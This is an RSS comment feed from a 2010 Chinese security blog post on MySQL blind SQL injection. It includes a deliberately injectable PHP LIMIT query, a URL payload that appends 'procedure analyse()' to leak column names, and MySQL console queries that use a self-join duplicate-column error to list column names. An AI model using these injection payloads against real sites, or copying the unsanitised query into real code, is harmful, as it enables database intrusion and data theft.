<![CDATA[Mysql 另类盲注中的一些技巧]]> http://www.oldjun.com/blog/index.php/archives/62/ Looking for change zh-cn-utf8 http://blogs.law.harvard.edu/tech/rss Magike 1.2.0 Release oldjun <![CDATA[xi4oyu]]> http://www.oldjun.com/blog/index.php/archives/62/#comment-647 > http://www.oldjun.com/blog/index.php/archives/62/#comment-647 Tue, 20 Apr 2010 08:17:59 +0800 赞一个

]]> <![CDATA[雨中风铃]]> http://www.oldjun.com/blog/index.php/archives/62/#comment-648 > http://www.oldjun.com/blog/index.php/archives/62/#comment-648 Tue, 20 Apr 2010 16:41:50 +0800 在mysql命令行下使用procedure analyse可以获取字段名称,在注入时能否爆出字段名称?

]]> <![CDATA[oldjun]]> http://www.oldjun.com/blog/index.php/archives/62/#comment-650 > http://www.oldjun.com/blog/index.php/archives/62/#comment-650 Tue, 20 Apr 2010 19:10:30 +0800 query("select username,password from cdb_members where uid=1 limit $limit"); while($test = $db->fetch_array($query)) { foreach($test as $value){ $arr[]=$value; } } echo $arr[0]; http://127.0.0.1/bbs/test.php?limit=0,1 正常获取数据 http://127.0.0.1/bbs/test.php?limit=0,1 procedure analyse() 字段名称出来了]]> 确实比较鸡肋,看运气了,说不定遇到下面这段代码呢:

$query=$db->query("select username,password from cdb_members where uid=1 limit $limit");
while($test = $db->fetch_array($query)) {
foreach($test as $value){
$arr[]=$value;
}
}
echo $arr[0];

http://127.0.0.1/bbs/test.php?limit=0,1
正常获取数据

http://127.0.0.1/bbs/test.php?limit=0,1 procedure analyse()
字段名称出来了

]]> <![CDATA[B100d5w0rd]]> http://www.oldjun.com/blog/index.php/archives/62/#comment-651 > http://www.oldjun.com/blog/index.php/archives/62/#comment-651 Wed, 21 Apr 2010 18:13:01 +0800 偶像就是偶像啊,学习了,膜拜
不过盲射实在太累了,遇到情愿不日了哈哈

]]> <![CDATA[menzhi007]]> http://www.oldjun.com/blog/index.php/archives/62/#comment-657 > http://www.oldjun.com/blog/index.php/archives/62/#comment-657 Tue, 04 May 2010 19:34:31 +0800 再赞一个

]]> <![CDATA[nod32升级id » Mysql另类盲注中的一些技巧 By oldjun]]> http://www.oldjun.com/blog/index.php/archives/62/#comment-665 > http://www.oldjun.com/blog/index.php/archives/62/#comment-665 Sat, 08 May 2010 01:04:24 +0800 [...][...]

]]> <![CDATA[ Mysql另类盲注中的一些技巧 | kindle's blog]]> http://www.oldjun.com/blog/index.php/archives/62/#comment-667 > http://www.oldjun.com/blog/index.php/archives/62/#comment-667 Wed, 12 May 2010 10:06:44 +0800 [...][...]

]]> <![CDATA[oldjun]]> http://www.oldjun.com/blog/index.php/archives/62/#comment-766 > http://www.oldjun.com/blog/index.php/archives/62/#comment-766 Thu, 22 Jul 2010 00:34:16 +0800 select * from mysql.user where exists(select * from (select * from func a join func b) as c); ERROR 1060 (42S21): Duplicate column name 'name' mysql> select * from mysql.user where exists(select * from (select * from func a join func b using(name)) as c); ERROR 1060 (42S21): Duplicate column name 'ret' mysql> select * from mysql.user where exists(select * from (select * from func a join func b using(name,ret)) as c); ERROR 1060 (42S21): Duplicate column name 'dl']]> mysql> select * from mysql.user where exists(select * from (select * from func a join func b) as c);
ERROR 1060 (42S21): Duplicate column name 'name'
mysql> select * from mysql.user where exists(select * from (select * from func a join func b using(name)) as c);
ERROR 1060 (42S21): Duplicate column name 'ret'
mysql> select * from mysql.user where exists(select * from (select * from func a join func b using(name,ret)) as c);
ERROR 1060 (42S21): Duplicate column name 'dl'

]]>